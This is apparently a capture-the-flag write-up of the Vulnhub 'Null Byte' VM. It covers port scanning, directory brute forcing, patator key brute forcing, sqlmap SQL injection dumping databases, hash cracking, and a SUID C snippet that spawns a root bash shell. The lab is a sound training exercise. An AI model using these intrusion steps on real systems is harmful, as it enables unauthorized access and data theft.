# NullByte Walkthrough Here's my attempt to provide walkthroughs for various VM's from Vulnhub & HTB. ## Null Byte (Vulnhub) First off we need to identify the IP address the VM spin up on: ``` $ nmap -sn 192.168.1.0/24 ``` {% hint style="info" %} nmap changed syntax\ nmap -sP 192.168.1.0/24 {% endhint %} We will need the following code if we encounter a SUID binary: ``` ps.c # Ain't no code for that yet, sorry include int main() { setuid(0); setguid(0); execl("/bin/bash", "bash", (char *)NULL); return 0; } ``` We identify which port(s) are listening for the server:\ nmap -O -v -sS 192.168.1.142 ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKu7l0ge_r_4B5k41J%2Finitial-1.jpg?alt=media\&token=c7b1ba80-ec9a-4840-a235-e632af12f8b3) \ \ We noticed a web server on port 80. What's listening on port 777 - we can utilize netcat to check for the service banner. Ahh it's actually the SSH daemon. Once we have a user and a valid pass we can attempt for a shell on the box using:\ **ssh user\@192.168.1.142 -p 777**
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKuSinjAP3n0edEP3x%2Fintial-2.jpg?alt=media\&token=16be0b81-20ef-4adc-ab46-03fdd9fcbfe9) \ Let's see what other interesting directories we can find by using dirbuster with a wordlist. ``` gobuster dir -u http://192.168.1.142 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt ``` Only 2 directories which appears interesting and not much we can do as directory listing is disabled on the uploads folder and we need credentials for the phpmyadmin page.
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKvG53DmDxAA4PjlgB%2Finitial-3.jpg?alt=media\&token=08c9514c-0dad-4be8-89d3-549ab30a17e0) Here most people including me didn't know that the next step would be to analyze the default image displayed on the home page. ![default page of webserver](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKvodxj6w0-RaOJ0i3%2Finitial-4.jpg?alt=media\&token=55116c50-5749-4bdf-b623-4ea889739d6f) The sentence is from an ancient Egyptian proverb. If we run the image (GIF in this case) through a tool called EXIF we can get any text hidden inside the image. ![exif text shown](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKwscVz-lGOy-R0TQk%2Finitial-5.jpg?alt=media\&token=7cf261bd-ae4b-4cd8-ae52-7dcc3d91e616) This text string after some consideration is actually a directory on the webserver. On initial looks it's asking for some key. This is where one can only resort to brute force to perhaps see if it's a simple key.\ Viewing the source code reveals something in the lines of:\ \&#xNAN;*\* ![text hidden inside image reveals a page asking for a key](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlKxesObaZ-cmmhkVHX%2Finitial-6.jpg?alt=media\&token=ffcceac5-cd1c-45c0-9f55-265e641425ba) patator http\_fuzz url= method=POST body='key=FILE0' 0=/home/kali/10k-most-common.txt follow=1 -x ignore:fgrep='invalid key'\
![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlL1cyTxdC9bLvIvYYy%2Finitial-7.jpg?alt=media\&token=0a443c16-8c14-42aa-b7be-d68abc212389) Next we move on to the next page revealed. we put in a to search. it reveals a user called ramses. ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlKpbefeE41E96HH0RM%2F-MlL28lZ_VkX2Ult7uXX%2Finitial-8.jpg?alt=media\&token=e7fd3526-8aa7-4f27-8f0c-b35205329cae) just browsing to or using curl\ \ \ we get the following results:\ EMP ID :1 EMP NAME : ramses ### ***EMP POSITION :*** ***EMP ID :2 EMP NAME : isis*** ### ***EMP POSITION : employee*** ***Fetched data successfully*** *These could be 2 possible users on the system. This is where we will need to check if the page is vulnerable to sql injection. The quickest would be to use sqlmap:*\ \ sqlmap -u --dbs\ \ \ low and behold we can see all the databases:\ \ \[10:45:14] \[INFO] fetching database names available databases \[5]: \[*] information\_schema* \ *\[*] mysql \ \[*] performance\_schema* \ *\[*] phpmyadmin \ \[\*] seth\ \ sqlmap -u [http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch='DESCRIBE](http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=%27DESCRIBE) phpmyadmin' --dbs --dump ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL2NEATSWmX2P5AmxN%2F-MlL3ts0-6ObQ3IDm--6%2Finitial-9.jpg?alt=media\&token=20a7b6fe-635c-4052-8b28-5f84e2bcc96c) \ we're presented with a strange hash string next to the username ramses. we can utilize the following URI to quickly identify the hash type:\ \ as seen below it's actually a base64 encoded string ![base64 decode](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL2NEATSWmX2P5AmxN%2F-MlL5icmzkXA8twBpvX_%2Fintiial-12.jpg?alt=media\&token=c24544ef-4d99-418a-b977-d163a918e787) running the md5 hash through crackstation shows us a possible password: ![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MlKjYaxo0rpR2Jsapi3%2F-MlL5oho9BaHaqNpTZY6%2F-MlL6SqQE0W1Natnb86h%2Finitial-13.jpg?alt=media\&token=435e8f44-fa40-4318-a908-d6abf0670f91) \ \